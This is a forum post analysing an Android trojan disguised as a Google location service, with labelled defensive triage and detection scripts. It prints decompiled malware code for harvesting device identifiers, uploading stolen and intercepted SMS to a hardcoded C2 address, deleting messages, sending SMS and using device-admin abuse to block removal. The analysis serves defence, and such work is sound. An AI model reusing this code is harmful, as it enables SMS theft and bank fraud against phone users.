[Mobile Sample Analysis] Analysis of a rogue SMS-interception trojan that masquerades as a Google process and cannot be uninstalled

leerina, posted 2015-12-8 21:12
1. Sample information

Sample source: http://www.52pojie.cn/thread-443228-1-1.html
File name:
拦截马.apk
MD5: d9af14e323ec322252af93d246d735dd
File size: 60.42KB
Upload time: 2015-12-08 19:54:40
Package name: com.google.process.locations
Minimum runtime: Android 2.3, 2.3.1, 2.3.2
Copyright:
Android
2. Behaviour analysis
When run in a virtual machine it prompts the user to "activate device performance" (a device-administrator request). Once activated and granted those elevated privileges, any attempt to revoke the authorisation turns the screen black, the home screen can no longer be reached, and antivirus software cannot remove it:

The sample cannot be uninstalled:


Antivirus software cannot uninstall it either:

3. Sample analysis
Decompile the sample and start with the configuration file (AndroidManifest.xml) and the permissions it requests:
<?xml version="1.0" encoding="utf-8" standalone="no"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.google.process.locations" platformBuildVersionCode="21" platformBuildVersionName="APKTOOL">
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.MOUNT_UNMOUNT_FILESYSTEMS"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <uses-permission android:name="android.permission.GET_TASKS"/>
    <uses-permission android:name="android.permission.WAKE_LOCK"/>
    <uses-permission android:name="android.permission.READ_LOGS"/>
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
    <uses-permission android:name="android.permission.SIGNAL_PERSISTENT_PROCESSES"/>
    <uses-permission android:name="android.permission.PERSISTENT_ACTIVITY"/>
    <uses-permission android:name="android.permission.DISABLE_KEYGUARD"/>
    <uses-permission android:name="com.android.launcher.permission.INSTALL_SHORTCUT"/>
    <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
    <uses-permission android:name="android.permission.ACCESS_LOCATION_EXTRA_COMMANDS"/>
    <uses-permission android:name="android.permission.ACCESS_MOCK_LOCATION"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
    <uses-permission android:name="android.permission.BATTERY_STATS"/>
    <uses-permission android:name="android.permission.BROADCAST_STICKY"/>
    <uses-permission android:name="android.permission.CHANGE_CONFIGURATION"/>
    <uses-permission android:name="android.permission.CHANGE_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
    <uses-permission android:name="android.permission.CHANGE_WIFI_MULTICAST_STATE"/>
    <uses-permission android:name="android.permission.CLEAR_APP_CACHE"/>
    <uses-permission android:name="android.permission.WRITE_SETTINGS"/>
    <uses-permission android:name="android.permission.READ_SMS"/>
    <uses-permission android:name="android.permission.RECEIVE_SMS"/>
    <uses-permission android:name="android.permission.WRITE_SMS"/>
    <uses-permission android:name="android.permission.SEND_SMS"/>
    <application android:allowBackup="false" android:icon="@drawable/ic_launcher" android:label="@string/app_name" android:name=".GoogleApplication" android:persistent="true" android:theme="@style/AppTheme">
        <activity android:label="@string/app_name" android:launchMode="singleTask" android:name=".MainActivity">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>
        <activity android:label="@string/app_name" android:launchMode="singleTask" android:name=".InActivity">
            <intent-filter>
                <action android:name="android.intent.action.VIEW"/>
                <category android:name="android.intent.category.DEFAULT"/>
                <category android:name="android.intent.category.BROWSABLE"/>
                <data android:host="*" android:pathPrefix="/m" android:scheme="googles"/>
            </intent-filter>
        </activity>
        <receiver android:name=".BootReceiver">
            <intent-filter android:priority="1000">
                <action android:name="android.intent.action.BOOT_COMPLETED"/>
                <action android:name="android.intent.action.PRE_BOOT_COMPLETED"/>
                <action android:name="android.intent.action.REBOOT"/>
            </intent-filter>
            <intent-filter android:priority="1000">
                <action android:name="android.intent.action.PACKAGE_ADDED"/>
                <action android:name="android.intent.action.PACKAGE_CHANGED"/>
                <action android:name="android.intent.action.PACKAGE_REMOVED"/>
                <action android:name="android.intent.action.PACKAGE_DATA_CLEARED"/>
                <action android:name="android.intent.action.PACKAGE_INSTALL"/>
                <action android:name="android.intent.action.PACKAGE_REPLACED"/>
                <action android:name="android.intent.action.PACKAGE_RESTARTED"/>
                <data android:scheme="package"/>
            </intent-filter>
            <intent-filter android:priority="1000">
                <action android:name="android.provider.Telephony.SECRET_CODE"/>
                <category android:name="android.intent.category.HOME"/>
                <data android:host="06" android:scheme="android_secret_code"/>
            </intent-filter>
            <intent-filter android:priority="1000">
                <action android:name="android.intent.action.PHONE_STATE"/>
                <action android:name="android.net.wifi.WIFI_STATE_CHANGED"/>
                <action android:name="android.intent.action.SIG_STR"/>
                <action android:name="android.intent.action.SERVICE_STATE"/>
                <action android:name="android.intent.action.AIRPLANE_MODE"/>
            </intent-filter>
            <intent-filter android:priority="1000">
                <action android:name="android.intent.action.TIME_SET"/>
                <action android:name="android.intent.action.TIMEZONE_CHANGED"/>
                <action android:name="android.intent.action.LOCALE_CHANGED"/>
                <action android:name="android.intent.action.DATE_CHANGED"/>
            </intent-filter>
            <intent-filter android:priority="1000">
                <action android:name="android.intent.action.ACTION_POWER_CONNECTED"/>
                <action android:name="android.intent.action.ACTION_POWER_DISCONNECTED"/>
                <action android:name="android.intent.action.POWER_USAGE_SUMMARY"/>
                <action android:name="android.intent.action.ACTION_SHUTDOWN"/>
            </intent-filter>
            <intent-filter android:priority="1000">
                <action android:name="android.intent.action.SYNC_STATE_CHANGED"/>
                <action android:name="com.android.sync.SYNC_CONN_STATUS_CHANGED"/>
            </intent-filter>
            <intent-filter android:priority="1000">
                <action android:name="android.intent.action.HEADSET_PLUG"/>
            </intent-filter>
            <intent-filter android:priority="1000">
                <action android:name="android.media.RINGER_MODE_CHANGED"/>
            </intent-filter>
            <intent-filter android:priority="1000">
                <action android:name="android.intent.action.MEDIA_BAD_REMOVAL"/>
                <action android:name="android.intent.action.MEDIA_EJECT"/>
                <action android:name="android.intent.action.MEDIA_MOUNTED"/>
                <action android:name="android.intent.action.MEDIA_REMOVED"/>
                <action android:name="android.intent.action.MEDIA_SCANNER_FINISHED"/>
                <action android:name="android.intent.action.MEDIA_SCANNER_STARTED"/>
                <action android:name="android.intent.action.MEDIA_SCANNER_SHARED"/>
                <action android:name="android.intent.action.MEDIA_UNMOUNTED"/>
            </intent-filter>
        </receiver>
        <receiver android:name=".SmsReciver">
            <intent-filter android:priority="1000">
                <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
            </intent-filter>
        </receiver>
        <receiver android:name=".SmsReciver" android:permission="android.permission.BROADCAST_SMS">
            <intent-filter android:priority="1000">
                <action android:name="android.provider.Telephony.SMS_DELIVER"/>
            </intent-filter>
        </receiver>
        <receiver android:description="@string/device_info" android:label="@string/device" android:name=".DeviceReciver" android:permission="android.permission.BIND_DEVICE_ADMIN">
            <meta-data android:name="android.app.device_admin" android:resource="@xml/device_admin"/>
            <intent-filter>
                <action android:name="android.app.action.DEVICE_ADMIN_ENABLED"/>
            </intent-filter>
        </receiver>
        <service android:enabled="true" android:name="com.google.process.locations.GoogleLocationService" android:process=""/>
        <receiver android:name="d.d.SmsReceiver" android:permission="android.permission.BROADCAST_SMS">
            <intent-filter>
                <action android:name="android.provider.Telephony.SMS_DELIVER"/>
            </intent-filter>
        </receiver>
        <receiver android:name="d.d.MmsReceiver" android:permission="android.permission.BROADCAST_WAP_PUSH">
            <intent-filter>
                <action android:name="android.provider.Telephony.WAP_PUSH_DELIVER"/>
                <data android:mimeType="application/vnd.wap.mms-message"/>
            </intent-filter>
        </receiver>
        <activity android:name="d.d.ComposeSmsActivity">
            <intent-filter>
                <action android:name="android.intent.action.SEND"/>
                <action android:name="android.intent.action.SENDTO"/>
                <category android:name="android.intent.category.DEFAULT"/>
                <category android:name="android.intent.category.BROWSABLE"/>
                <data android:scheme="sms"/>
                <data android:scheme="smsto"/>
                <data android:scheme="mms"/>
                <data android:scheme="mmsto"/>
            </intent-filter>
        </activity>
        <service android:exported="true" android:name="d.d.HeadlessSmsSendService" android:permission="android.permission.SEND_RESPOND_VIA_MESSAGE">
            <intent-filter>
                <action android:name="android.intent.action.RESPOND_VIA_MESSAGE"/>
                <category android:name="android.intent.category.DEFAULT"/>
                <data android:scheme="sms"/>
                <data android:scheme="smsto"/>
                <data android:scheme="mms"/>
                <data android:scheme="mmsto"/>
            </intent-filter>
        </service>
        <service android:name="d.d.Default"/>
    </application>
</manifest>

The sensitive permissions among these are:
com.android.launcher.permission.INSTALL_SHORTCUT // create home-screen shortcuts
android.permission.READ_SMS // read SMS messages
android.permission.RECEIVE_SMS // monitor incoming SMS messages
android.permission.WRITE_SMS // write SMS messages
android.permission.SEND_SMS // send SMS messages
android.permission.MOUNT_UNMOUNT_FILESYSTEMS // mount and unmount external file systems
android.permission.GET_TASKS // get information about currently or recently running tasks
android.permission.READ_LOGS // read system logs    (used by the sample)
android.permission.RECEIVE_BOOT_COMPLETED // receive the boot-completed broadcast
android.permission.PERSISTENT_ACTIVITY // create a persistent Activity
android.permission.ACCESS_COARSE_LOCATION // coarse location
android.permission.ACCESS_FINE_LOCATION // precise location
android.permission.ACCESS_WIFI_STATE // read Wi-Fi network state
android.permission.CHANGE_WIFI_STATE // change Wi-Fi connection state
android.permission.WRITE_SETTINGS // read and write system settings
android.permission.INTERNET // network access (2G or 3G)
android.permission.WRITE_EXTERNAL_STORAGE // write external storage (e.g. SD card)
android.permission.READ_PHONE_STATE // read phone state
android.permission.WAKE_LOCK // keep the background process running after the screen turns off
android.permission.SIGNAL_PERSISTENT_PROCESSES // send signals to persistent processes
android.permission.DISABLE_KEYGUARD // disable the keyguard (lock screen)
android.permission.ACCESS_LOCATION_EXTRA_COMMANDS // access extra location-provider commands
android.permission.ACCESS_MOCK_LOCATION // obtain mock location information
android.permission.ACCESS_NETWORK_STATE // read network state (2G or 3G)
android.permission.BATTERY_STATS // battery usage statistics
android.permission.BROADCAST_STICKY // send sticky broadcasts
android.permission.CHANGE_CONFIGURATION // modify the current configuration
android.permission.CHANGE_NETWORK_STATE // change network state, e.g. whether networking is allowed
android.permission.CHANGE_WIFI_MULTICAST_STATE // change Wi-Fi multicast state
android.permission.CLEAR_APP_CACHE // clear application caches
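The manifest and permission list above are what an analyst triages first. The following script is an added example, not code from the post or from the sample: it parses a manifest with the standard library and flags the indicators this sample exhibits (Google-style package name, full SMS permission set plus INTERNET, android:persistent, a device-admin receiver, a priority-1000 SMS_RECEIVED receiver, and BOOT_COMPLETED autostart). The embedded manifests are constructed: one is a trimmed excerpt of the sample's manifest shown above, the other a benign app used to show the checks stay quiet on ordinary apps.

```python
"""Static triage of an AndroidManifest.xml for the indicators seen in this sample (added example)."""
import xml.etree.ElementTree as ET

A = "{http://schemas.android.com/apk/res/android}"  # expands the android: attribute prefix

SMS_PERMS = {"android.permission.READ_SMS", "android.permission.RECEIVE_SMS",
             "android.permission.WRITE_SMS", "android.permission.SEND_SMS"}
SMS_RECEIVED = "android.provider.Telephony.SMS_RECEIVED"
BOOT = "android.intent.action.BOOT_COMPLETED"
DEVICE_ADMIN = "android.permission.BIND_DEVICE_ADMIN"

# Constructed excerpt of the sample's manifest, trimmed to the elements the checks inspect.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.google.process.locations">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.WRITE_SMS"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <application android:name=".GoogleApplication" android:persistent="true">
    <receiver android:name=".BootReceiver">
      <intent-filter android:priority="1000">
        <action android:name="android.intent.action.BOOT_COMPLETED"/>
      </intent-filter>
    </receiver>
    <receiver android:name=".SmsReciver">
      <intent-filter android:priority="1000">
        <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
      </intent-filter>
    </receiver>
    <receiver android:name=".DeviceReciver" android:permission="android.permission.BIND_DEVICE_ADMIN">
      <meta-data android:name="android.app.device_admin" android:resource="@xml/device_admin"/>
      <intent-filter>
        <action android:name="android.app.action.DEVICE_ADMIN_ENABLED"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>
"""

# Constructed manifest of an ordinary app: no finding should fire on it.
BENIGN_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="org.example.notes">
  <uses-permission android:name="android.permission.INTERNET"/>
  <application android:name=".NotesApp">
    <activity android:name=".MainActivity"/>
  </application>
</manifest>
"""


def triage_manifest(xml_text):
    """Return a list of human-readable findings; an empty list means no indicator fired."""
    root = ET.fromstring(xml_text)
    findings = []

    pkg = root.get("package", "")
    if pkg.startswith(("com.google.", "com.android.")):
        findings.append(f"package {pkg} imitates a Google/platform namespace")

    perms = {p.get(A + "name") for p in root.iter("uses-permission")}
    if SMS_PERMS <= perms and "android.permission.INTERNET" in perms:
        findings.append("full SMS permission set plus INTERNET: SMS theft/relay capability")

    app = root.find("application")
    if app is not None and app.get(A + "persistent") == "true":
        # The platform honours android:persistent only for system apps, but asking for it is a tell.
        findings.append("android:persistent=\"true\" requested")

    for recv in root.iter("receiver"):
        name = recv.get(A + "name")
        if recv.get(A + "permission") == DEVICE_ADMIN:
            findings.append(f"device-admin receiver {name}: uninstall is refused while admin is active")
        for flt in recv.findall("intent-filter"):
            prio = int(flt.get(A + "priority", "0"))
            actions = {a.get(A + "name") for a in flt.findall("action")}
            if SMS_RECEIVED in actions and prio >= 999:
                findings.append(f"{name} receives SMS_RECEIVED at priority {prio}: "
                                "can abort the broadcast ahead of the stock SMS app on pre-4.4 devices")
            if BOOT in actions:
                findings.append(f"{name} autostarts on BOOT_COMPLETED")
    return findings


if __name__ == "__main__":
    for finding in triage_manifest(SAMPLE_MANIFEST):
        print("-", finding)
```

Against the sample excerpt every check fires (six findings); against the benign manifest none do. On a real APK, feed it the manifest decoded by apktool, as the post did.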

Malicious behaviour 1: collecting phone information such as the IMEI:
if ((paramBoolean) || (!bool))
{
  TelephonyManager localTelephonyManager = (TelephonyManager)getSystemService("phone"); // collects the user's IMEI, phone number, OS version and similar information
  if (localTelephonyManager.getSimState() == 5) // 5 == TelephonyManager.SIM_STATE_READY
  {
    str1 = localTelephonyManager.getLine1Number();     // phone number
    str2 = localTelephonyManager.getSimSerialNumber(); // SIM serial (ICCID); the sample stores it under the key "imei"
    str3 = localTelephonyManager.getSubscriberId();    // IMSI
    str4 = Build.VERSION.SDK_INT;                      // API level (an int; the decompiler's variable names are approximate)
    str5 = Build.VERSION.RELEASE;                      // Android version string
    localJSONObject = new JSONObject();
  }
}
try
{
  localJSONObject.put("tel", str1);
  localJSONObject.put("imei", str2);
  localJSONObject.put("imsi", str3);
  localJSONObject.put("sdk", str4);
  localJSONObject.put("release", str5);
  if (GoogleApplication.d); // decompiler artifact: together with the loop below, "mode" becomes 2 when GoogleApplication.d is set, otherwise 1
  for (int i = 2; ; i = 1)
  {
    localJSONObject.put("mode", i);
    i.a(this, 2, localJSONObject); // hands the JSON to the upload helper in class i with message type 2
    label183: localSharedPreferences.edit().putBoolean("num", true).commit(); // remembers that the device info has been sent
    if (!paramBoolean)
      GoogleApplication.g = localSharedPreferences.getBoolean("send", true);
    return;
  }

Malicious behaviour 2: contacting the remote server:
public static String b()
{
  return "45.127.99.27"; // remote server address; opened in a browser it serves a phishing site impersonating ICBC (工商银行)
}

public static DefaultHttpClient b(String paramString) // builds the HTTP client used for the requests
{
  BasicHttpParams localBasicHttpParams = new BasicHttpParams();
  localBasicHttpParams.setParameter("http.protocol.cookie-policy", ""); // selects the custom cookie spec registered under "" below
  HttpProtocolParams.setVersion(localBasicHttpParams, HttpVersion.HTTP_1_1);
  HttpProtocolParams.setContentCharset(localBasicHttpParams, "ISO-8859-1");
  HttpProtocolParams.setUseExpectContinue(localBasicHttpParams, true);
  HttpProtocolParams.setUserAgent(localBasicHttpParams, paramString); // caller-supplied User-Agent
  HttpConnectionParams.setConnectionTimeout(localBasicHttpParams, 3000); // 3 s connect and read timeouts
  HttpConnectionParams.setSoTimeout(localBasicHttpParams, 3000);
  SchemeRegistry localSchemeRegistry = new SchemeRegistry();
  localSchemeRegistry.register(new Scheme("http", PlainSocketFactory.getSocketFactory(), 80));
  localSchemeRegistry.register(new Scheme("https", SSLSocketFactory.getSocketFactory(), 443));
  DefaultHttpClient localDefaultHttpClient = new DefaultHttpClient(new ThreadSafeClientConnManager(localBasicHttpParams, localSchemeRegistry), localBasicHttpParams);
  j localj = new j();
  localDefaultHttpClient.getCookieSpecs().register("", localj); // custom cookie handling implemented in class j
  return localDefaultHttpClient;
}
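Behaviours 1 and 2 together give a network-side fingerprint: a POST to the address returned by b() whose JSON body carries the keys built in behaviour 1 (tel, imei, imsi, sdk, release, mode) or, for the SMS upload shown under behaviour 3, number, time, body and type. The script below is an added example, not part of the post or the sample: it runs that check over constructed proxy log lines in a hypothetical "<client> <method> <url> <body-or-dash>" format. The URL path /upload and all values in the log lines are made up; the page does not show the sample's request paths.

```python
"""Flag HTTP requests that match this sample's beacons (added example, constructed log lines)."""
import json
from urllib.parse import urlparse

C2_HOST = "45.127.99.27"  # address returned by b() in the decompiled code above
# Key sets of the two JSON payloads the decompiled code builds: device info, and one SMS record.
DEVICE_KEYS = {"tel", "imei", "imsi", "sdk", "release", "mode"}
SMS_KEYS = {"number", "time", "body", "type"}

# Constructed proxy log lines; the /upload path is a placeholder, not the sample's real path.
SAMPLE_LOG = [
    '10.0.2.15 POST http://45.127.99.27/upload {"tel":"+86138000000","imei":"89860000000000000000","imsi":"460000000000000","sdk":10,"release":"2.3.6","mode":2}',
    '10.0.2.15 POST http://45.127.99.27/upload {"number":"12345","time":"1449575000000","body":"your code is 123456","type":1}',
    '10.0.2.16 POST http://example.invalid/api {"user":"alice","action":"login"}',
    '10.0.2.17 GET http://45.127.99.27/ -',
]


def classify(line):
    """Return (client, reasons); reasons lists why the request resembles this sample's traffic."""
    client, method, url, body = line.split(" ", 3)
    reasons = []
    if urlparse(url).hostname == C2_HOST:
        reasons.append("contacts known C2 host")
    if method == "POST" and body != "-":
        try:
            payload = json.loads(body)
        except ValueError:
            payload = None  # not JSON: the schema checks below do not apply
        if isinstance(payload, dict):
            keys = set(payload)
            if DEVICE_KEYS <= keys:
                reasons.append("device-info beacon (phone number/ICCID/IMSI)")
            elif SMS_KEYS <= keys:
                reasons.append("stolen SMS record upload")
    return client, reasons


def scan(lines):
    """Return only the (client, reasons) pairs that triggered at least one reason."""
    return [(client, reasons) for client, reasons in map(classify, lines) if reasons]


if __name__ == "__main__":
    for client, reasons in scan(SAMPLE_LOG):
        print(client, "->", "; ".join(reasons))
```

The host match alone catches the GET from a third device; the schema checks additionally tell a device-info beacon from an SMS upload, which is useful when the same infrastructure is reused under a new address.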


Malicious behaviour 3: reading SMS messages, contacts and other information:
import android.content.ContentResolver;
import android.database.ContentObserver;
import android.database.Cursor;
import android.net.Uri;
import android.os.Handler;
import org.json.JSONException;
import org.json.JSONObject;

class g extends ContentObserver
{
  private final GoogleLocationService a; // owning service; the field is restored here, the decompiler dropped the synthetic reference
  private Cursor b = null;

  public g(GoogleLocationService paramGoogleLocationService, Handler paramHandler)
  {
    super(paramHandler);
    this.a = paramGoogleLocationService;
  }

  public void onChange(boolean paramBoolean)
  {
    super.onChange(paramBoolean);
    Cursor localCursor = this.a.getContentResolver().query(Uri.parse("content://sms/"), new String[] { "_id", "address", "person", "body", "date", "type" }, null, null, "_id desc"); // reads the SMS store (newest first) and formats the newest message as JSON
    String str1;
    String str2;
    String str3;
    int n;
    JSONObject localJSONObject;
    if ((localCursor.getCount() > 0) && (localCursor.moveToFirst()))
    {
      int i = localCursor.getColumnIndex("address");
      int j = localCursor.getColumnIndex("body");
      int k = localCursor.getColumnIndex("date");
      int m = localCursor.getColumnIndex("type");
      str1 = localCursor.getString(i);
      str2 = localCursor.getString(j);
      str3 = localCursor.getString(k);
      n = localCursor.getInt(m);
      localJSONObject = new JSONObject();
    }
    try
    {
      localJSONObject.put("number", str1);
      localJSONObject.put("time", str3);
      localJSONObject.put("body", str2);
      localJSONObject.put("type", n);
      if ((n % 2 == 1) && (GoogleApplication.d)) // type 1 == inbox; this call matches the signature of the deletion routine under behaviour 4
        i.a(this.a.getApplicationContext(), str2);
      i.a(this.a, 4, localJSONObject); // uploads the SMS record with message type 4
      label241: localCursor.close();
      return;
    }
    catch (JSONException localJSONException)
    {
      break label241;
    }
  }
}
public class SmsReciver extends BroadcastReceiver // intercepts incoming SMS
{
  public void onReceive(Context paramContext, Intent paramIntent)
  {
    Object localObject1 = null;
    Bundle localBundle = paramIntent.getExtras();
    Object[] arrayOfObject;
    int j;
    String str1;
    String str2;
    if (localBundle != null)
    {
      if (GoogleApplication.d)
        abortBroadcast(); // with the priority-1000 filter from the manifest this hides the message from the stock SMS app (pre-4.4; non-abortable since Android 4.4)
      arrayOfObject = (Object[])localBundle.get("pdus"); // raw SMS PDUs
      int i = arrayOfObject.length;
      j = 0;
      str1 = null;
      str2 = null;
      if (j >= i)
        i.a(paramContext, str2.toString(), str1.toString(), localObject1.toString(), 1); // forwards sender, body and timestamp once all PDUs are parsed (loop body omitted by the decompiler)
    }
    else
    {
      return;
    }
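The SmsReciver above relies on how Android dispatches SMS_RECEIVED as an ordered broadcast: the manifest gives the receiver priority 1000 and onReceive() calls abortBroadcast(), so on the Android 2.3 devices this sample targets the message never reaches the stock SMS app. The model below is an added example, not code from the post or the sample; it simulates that dispatch order in plain Python and contrasts it with the Android 4.4 behaviour (SMS_RECEIVED no longer abortable, SMS_DELIVER only to the user-chosen default SMS app), which is the platform mitigation and also the reason the manifest declares the d.d.* SMS components. The receivers are constructed stand-ins; only the names, priority and abort call come from the page.

```python
"""Model of Android ordered-broadcast delivery for incoming SMS (added example)."""
from dataclasses import dataclass


@dataclass(frozen=True)
class Receiver:
    name: str
    priority: int
    aborts: bool = False  # whether onReceive() calls abortBroadcast()


# Constructed stand-ins: the stock messaging app at default priority, and the sample's
# SmsReciver as declared in its manifest (priority 1000) and code (abortBroadcast()).
STOCK_SMS_APP = Receiver("com.android.mms", priority=0)
MALWARE = Receiver("com.google.process.locations/.SmsReciver", priority=1000, aborts=True)


def sms_received_pre_kitkat(receivers):
    """Android <= 4.3: SMS_RECEIVED is an ordered, abortable broadcast. Receivers run from
    highest to lowest priority; once one aborts, the rest (including the stock SMS app)
    never see the message, so it silently disappears from the inbox."""
    delivered = []
    for r in sorted(receivers, key=lambda r: r.priority, reverse=True):
        delivered.append(r.name)
        if r.aborts:
            break
    return delivered


def sms_received_kitkat(receivers, default_sms_app):
    """Android >= 4.4: SMS_RECEIVED is still delivered to every receiver but can no longer be
    aborted, and only the default SMS app receives SMS_DELIVER (and may write the inbox).
    Returns (receivers that observed SMS_RECEIVED, receiver that got SMS_DELIVER)."""
    observed = [r.name for r in sorted(receivers, key=lambda r: r.priority, reverse=True)]
    deliver_to = default_sms_app.name if default_sms_app in receivers else None
    return observed, deliver_to


if __name__ == "__main__":
    print("pre-4.4 :", sms_received_pre_kitkat([STOCK_SMS_APP, MALWARE]))
    print("4.4+    :", sms_received_kitkat([STOCK_SMS_APP, MALWARE], STOCK_SMS_APP))
```

Pre-4.4 the list stops at the sample's receiver and the stock app is never reached; on 4.4+ both observe the broadcast but only the default SMS app gets SMS_DELIVER, so the interception works only if the user has been talked into making the malicious app the default messaging app.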

Malicious behaviour 4: deleting SMS messages, contacts and other information:
public static void a(Context paramContext, String paramString)
{
  try
  {
    Uri localUri = Uri.parse("content://sms/inbox");
    Cursor localCursor = paramContext.getContentResolver().query(localUri, null, "read=0", null, null); // reads the unread messages in the inbox
    while (true)
    {
      if (!localCursor.moveToNext())
        return;
      if (!localCursor.getString(localCursor.getColumnIndex("body")).trim().equals(paramString)) // only messages whose body equals the given text
        continue;
      int i = localCursor.getInt(localCursor.getColumnIndex("_id"));
      paramContext.getContentResolver().delete(Uri.parse("content://sms"), "_id=" + i, null); // deletes the message
    }
  }
  catch (Exception localException)
  {
  }
}

Malicious behaviour 5: sending SMS messages:
private void g()
{
  g localg = new g(this, new Handler());
  getContentResolver().registerContentObserver(Uri.parse("content://sms/"), true, localg); // observer g (behaviour 3) is notified on every change to the SMS store
}

void Prompt(String paramString)
{
  SmsManager.getDefault().sendTextMessage("18839763762", (String)null, paramString, (PendingIntent)null, (PendingIntent)null); // sends an SMS to 18839763762
}

public IBinder onBind(Intent paramIntent)
{
  return null;
}

public void onCreate()
{
  Intent localIntent = new Intent(getApplicationContext(), GoogleLocationService.class);
  this.a = ((AlarmManager)getSystemService("alarm"));
  this.b = PendingIntent.getService(this, 0, localIntent, 268435456); // 268435456 == 0x10000000 == PendingIntent.FLAG_CANCEL_CURRENT
  long l = System.currentTimeMillis();
  this.a.setInexactRepeating(1, l, 5000L, this.b); // type 1 == AlarmManager.RTC: restarts the service every 5 s to keep it alive
  super.onCreate();
  c();
}

Malicious behaviour 6: obtaining a command-line environment:
import android.content.Context;
import android.content.pm.ApplicationInfo;
import android.content.pm.PackageManager;
import android.content.pm.PackageManager.NameNotFoundException;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;

public class ADRTLogCatReader
  implements Runnable
{
  private static Context context;

  public static void onContext(Context paramContext, String paramString)
  {
    if (context != null)
      return;
    context = paramContext.getApplicationContext();
    int i = 0;
    if ((0x2 & paramContext.getApplicationInfo().flags) != 0) // 0x2 == ApplicationInfo.FLAG_DEBUGGABLE: only proceeds for a debuggable build
      i = 1;
    while (i != 0)
      try
      {
        paramContext.getPackageManager().getPackageInfo(paramString, 128); // 128 == PackageManager.GET_META_DATA
        ADRTSender.onContext(context, paramString);
        new Thread(new ADRTLogCatReader(), "LogCat").start(); // background thread that reads logcat
        return;
        i = 0; // unreachable; decompiler artifact
      }
      catch (PackageManager.NameNotFoundException localNameNotFoundException)
      {
      }
  }

  public void run()
  {
    try
    {
      BufferedReader localBufferedReader = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec("logcat -v threadtime").getInputStream()), 20); // obtains a command-line environment and runs a string command
      while (true)
      {
        String str = localBufferedReader.readLine();
        if (str == null)
          break;
        ADRTSender.sendLogcatLines(new String[] { str }); // forwards every log line by broadcast
      }
    }
    catch (IOException localIOException)
    {
    }
  }
}
public static void sendFields(String paramString1, String paramString2, ArrayList<String> paramArrayList1, ArrayList<String> paramArrayList2, ArrayList<String> paramArrayList3)
{
  Intent localIntent = new Intent();
  localIntent.setPackage(debuggerPackageName); // broadcast is addressed to a specific package
  localIntent.setAction("com.adrt.FIELDS");
  localIntent.putExtra("package", paramString1);
  localIntent.putExtra("path", paramString2);
  localIntent.putExtra("fields", paramArrayList1);
  localIntent.putExtra("fieldValues", paramArrayList2);
  localIntent.putExtra("fieldKinds", paramArrayList3);
  context.sendBroadcast(localIntent);
}

public static void sendLogcatLines(String[] paramArrayOfString)
{
  Intent localIntent = new Intent();
  localIntent.setPackage(debuggerPackageName);
  localIntent.setAction("com.adrt.LOGCAT_ENTRIES");
  localIntent.putExtra("lines", paramArrayOfString);
  context.sendBroadcast(localIntent);
}

Malicious behaviour 7: keeping its Activity on top. When the user declines to "activate device performance", the interface stays pinned on top; after the user revokes device-admin rights, a custom Activity covers the whole home screen (a lock-screen effect) so the user can no longer operate the phone:
import android.app.Activity;
import android.app.admin.DevicePolicyManager;
import android.content.ComponentName;
import android.content.Intent;
import android.os.Bundle;
import android.view.KeyEvent;
import android.view.Window;

public class InActivity extends Activity
{
  private ComponentName a;
  private DevicePolicyManager b;

  private void a() // requests device-administrator activation for DeviceReciver if it is not active yet
  {
    this.b = ((DevicePolicyManager)getSystemService("device_policy"));
    this.a = new ComponentName(this, DeviceReciver.class);
    if (!this.b.isAdminActive(this.a))
    {
      Intent localIntent = new Intent("android.app.action.ADD_DEVICE_ADMIN");
      localIntent.putExtra("android.app.extra.DEVICE_ADMIN", this.a);
      startActivity(localIntent);
    }
  }

  private void b() // starts the background service
  {
    startService(new Intent(getApplicationContext(), GoogleLocationService.class));
  }

  public void onAttachedToWindow()
  {
    getWindow().setType(2004); // 2004 == WindowManager.LayoutParams.TYPE_KEYGUARD: places the window above the normal application layer
    super.onAttachedToWindow();
  }

  protected void onCreate(Bundle paramBundle)
  {
    super.onCreate(paramBundle);
    getWindow().setFlags(-2147483648, -2147483648); // sets window flag bit 0x80000000
    a();
    b();
    finish(); // the Activity exits once the admin request and the service have been started
  }
  public boolean onKeyDown(int paramInt, KeyEvent paramKeyEvent)
  {
    if (paramInt == 3) // 3 == KeyEvent.KEYCODE_HOME: swallows the Home key (only effective on older Android versions)
      return true;
    return super.onKeyDown(paramInt, paramKeyEvent);
  }
}

4. Summary
During the analysis I did not look deeply into the role of the phishing website; interested readers can dig further. I also have not written up how it obtains device privileges, mainly because most samples implement this the same way.
In the end I still have not removed the sample from the virtual machine, as I haven't found a good way to remove it.

If this post helped you, please take a moment to rate it; I'd be very grateful!!!

Comment

Hurry up and post the follow-up!!!  posted 2015-12-8 21:53


#2
常黑屏, posted 2015-12-8 21:25
Thanks for sharing, OP, thank you.
#3
Licoy, posted 2015-12-8 21:34
So how does one uninstall this kind of malware? And where did it come from?
#4
Myself_GF, posted 2015-12-8 21:39
#5
a1439932040, posted 2016-1-16 11:38
Thanks for sharing, OP.
#6
笑对VS人生, posted 2016-1-16 18:34 from mobile
Last edited by 笑对VS人生 on 2016-1-16 20:15

The only way is to delete it by force.

